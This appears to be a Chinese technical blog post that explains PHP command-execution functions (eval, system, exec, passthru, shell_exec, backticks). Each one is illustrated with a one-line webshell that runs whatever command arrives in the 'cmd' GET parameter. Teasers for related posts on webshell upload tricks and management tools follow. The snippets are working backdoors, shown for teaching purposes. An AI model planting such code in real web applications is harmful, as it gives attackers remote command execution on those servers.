WebShell

最新推荐文章于 2025-11-24 04:43:01 发布
原创 最新推荐文章于 2025-11-24 04:43:01 发布 · 162 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #web安全 #网络

本文详细介绍了PHP中用于执行外部命令的几个函数,包括eval()、System()、exec()、passthru()、shell_exec()以及反撇号操作符,这些函数允许开发者将字符串作为代码执行,但也可能带来安全风险,如被恶意利用执行任意系统命令。

1)eval()
将括号中的字符串变成代码执行,无返回值。

<?php
eval($_GET['cmd']);
?>

在这里插入图片描述
2)System(string command [, int return_var])
第一个参数为给定执行的命令;
第二个为可选参数,为命令执行后的状态码,0代表成功,1代表失败;
有返回值。

<?php
System($_GET['cmd'],$code);
echo "<br>";
echo $code;
?>

在这里插入图片描述
3)exec(string command [, string array [, int return_var]])
与system()类似,但不输出结果,而是返回结果的最后一行;
第一个参数为给定执行的命令;
第二个参数为可选参数,代表完整的返回结果,功能为把结果逐行追加到array的结尾处;
第三个参数为执行命令的状态码,0代表成功,1代表失败。

<?php
echo exec($_GET['cmd'],$array,$code);
echo "<br>";
print_r($array); //打印变量
echo "<br>";
echo "状态码: ".$code;
?>

在这里插入图片描述
4)passthru(string command [, int return_var])
该函数只调用命令,不返回任何结果,但会将结果原样直接输出到设备上;
第一个参数为给定执行的命令;
第二个参数为命令执行的状态码。

<?php
passthru($_GET['cmd'],$code);
echo "<br>";
echo "状态码为:".$code;
?>

在这里插入图片描述
5)shell_exec(String command)

<?php
echo shell_exec($_GET['cmd']);
?>

在这里插入图片描述
6)反撇号
与shell_exec功能相同,执行shell命令并返回输出的字符串,可以达到system()一样的效果

<?php
$test = $_GET['cmd'];
echo `$test`;
?>

在这里插入图片描述其实shell_exec就是反撇号的变体,实际上完全等于shell_exec,禁用这个函数就不行。

7)assert()
在这里插入图片描述

eval,system,exec,shell_exec的解释
weixin_43940853的博客
02-22 1105
(所有函数都在windows环境下运行,linux暂不考虑) 一.eval 执行php代码(不执行系统命令,比较常见的就是一句话木马) 二.system 执行系统命令(cat,ls,ping这些),不能代码执行 <?php system("dir"); echo "</br>"; ?> 三.exec <?php echo exec(dir); echo "&l...
eval和exec函数
菜鸟可以飞的博客
03-12 1270
1.eval() 函数    作用:      把一个字符串当成一个表达式来执行,返回表达式执行的结果    格式:      eval(source, globals=None, local=None)    示例:    x = 100    y = 200    s = "x + y"    a = eval(s)  # 300    print(a)    ls = {"x": 1, "y...
Webshell
heibaikong6的博客
08-25 5760
webshell webshell简介: webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、故武器管理等待一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服...
webshell
prodigal11的博客
02-05 1412
Webshell实现与隐藏探究 一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利
Webshell介绍
YIGAOYU的博客
10-07 2904
目录一. Webshell介绍1.1任务描述1.2 训练目标1.3 Webshell简介1.4 常见Webshell上传方式1.4.1 解析漏洞上传(1)IIS目录解析漏洞(2)文件解析漏洞(3)文件名解析(4)fast-CGI解析漏洞(5)Apache解析漏洞1.4.2 截断上传1.4.3 后台数据库备份1.4.4 利用数据库语句上传(1)MySQL数据库into outfile(2)建立新表写入木马(3)phpMyadmin设置错误1.5 Webshell的作用1.6 Webshel
WebShell分析
qq_37107430的博客
02-02 1515
WebShell是一种黑客常用的恶意脚本,主要目的是通过在目标服务器上植入恶意代码,获得执行操作的权限。
WebShell简介
A1_3_9_7的博客
11-30 767
• JSP类型• ASP类型• PHP类型。
webshell上传方式
2201_75472578的博客
09-10 551
当 secure_file_priv变量取值为空字符串,未指定任何特定路径时,意味着开关开启,文件读写不受路径限制,可在任意合法目录执行相关文件操作。而当 secure_file_priv被设成NULL,代表开关关闭,MySQL 会禁用文件导入与导出功能,禁止执行像 “LOAD DATA”“SELECT...INTO OUTFILE” 这类文件交互指令。2.网站自身配置文件中被写入病毒,找出木马代码,对其进行删除,注意备份。6.对数据库名,网页目录,账号密码等提高复杂度,避免相关路径爆破。
webshell实践
qq_60680687的博客
08-14 549
原理:我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。话说做webshell检测的时候,因为要绕过HIDS,常规的一句话木马,大马都基本上会被拦截,不得不去找了一些php提供的”安全函数“(ps,这里我所指的“安全函数”是php的内置的回调函数,因为本身这些方法都是php自提供的,所以还是一定程度上可以绕过的)。
Godzilla-一款强大的WebShell管理工具
08-13
Godzilla是一款强大的WebShell管理工具,它在web安全领域中扮演着重要的角色。WebShell是一种通过浏览器访问服务器的后门程序,通常被黑客利用来进行非法操作,如盗取数据、修改网页内容等。因此,对于网站管理员来...
蚁剑-一款强大的Webshell管理工具
08-12
蚁剑是一款专为网络安全人员设计的Webshell管理工具,它在web安全领域具有重要的地位。Webshell,是指通过网页上传的、能够控制服务器的后门程序。它能够让攻击者绕过正常的登录验证,直接通过网页对服务器进行操作...
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
wso_webshell_php_
10-01
Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的"Webshell",暗示了这个压缩包可能包含了一系列不同版本的Webshell工具,具体来说,是WSO(Web Shell...
Bagisto单独将后台设置成中文
CHINAHEAO的专栏
11-23 200
趣玩游戏 游戏礼包 [!--empirenews.listtemp--] [!--empirenews.listtemp--] 安卓app下载 苹果app下载×-->
QoS质量配置
2509_94007099的博客
11-20 665
当自定义排队在某个接口上生效的时候,系统将会为这个接口维护17个输出队列。你可 以指定队列1到16。与每一个输出队列相关的是可配置字节总数以及数据包的类型。可 配置字节总数指定在系统移动到下一个队列以前,系统应当从当前的队列中发送多少字 节的数据。编号为0的队列是一个系统队列;在任何编号为1到16之间的队列得到处理以前,编号 为0的队列将先被清空。系统把优先权级别高的数据包,例如保持活动数据包以及信令 数据包,安排到这个队列。其他的通信不能够使用这个队列。
【HTML+CSS】使用HTML与后端技术连接数据库
最新发布
2509_94007310的博客
11-24 600
HTML负责构建网页的骨架,提供用户交互的表单等元素。用户通过表单输入数据,并通过表单的提交(submit)事件将数据发送到后端。
华为OD机试真题精讲:电脑病毒感染(Python/Java/C++多语言实现)
weixin_50859396的博客
11-20 106
摘要:题目模拟电脑病毒在网络中的传播过程,给定电脑数量、连接关系和初始感染列表,计算不超过k轮传播后的感染总数(k=-1时计算全部可达电脑)。核心解法为使用邻接表表示无向图,通过BFS层次遍历实现病毒传播轮次控制,用visited数组标记感染状态和轮数。Python/Java实现均需处理大数据量(n≤1e5,m≤2e5),时间优化至O(n+m),空间O(n)。边界条件包括k=0、网络不连通等情况。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值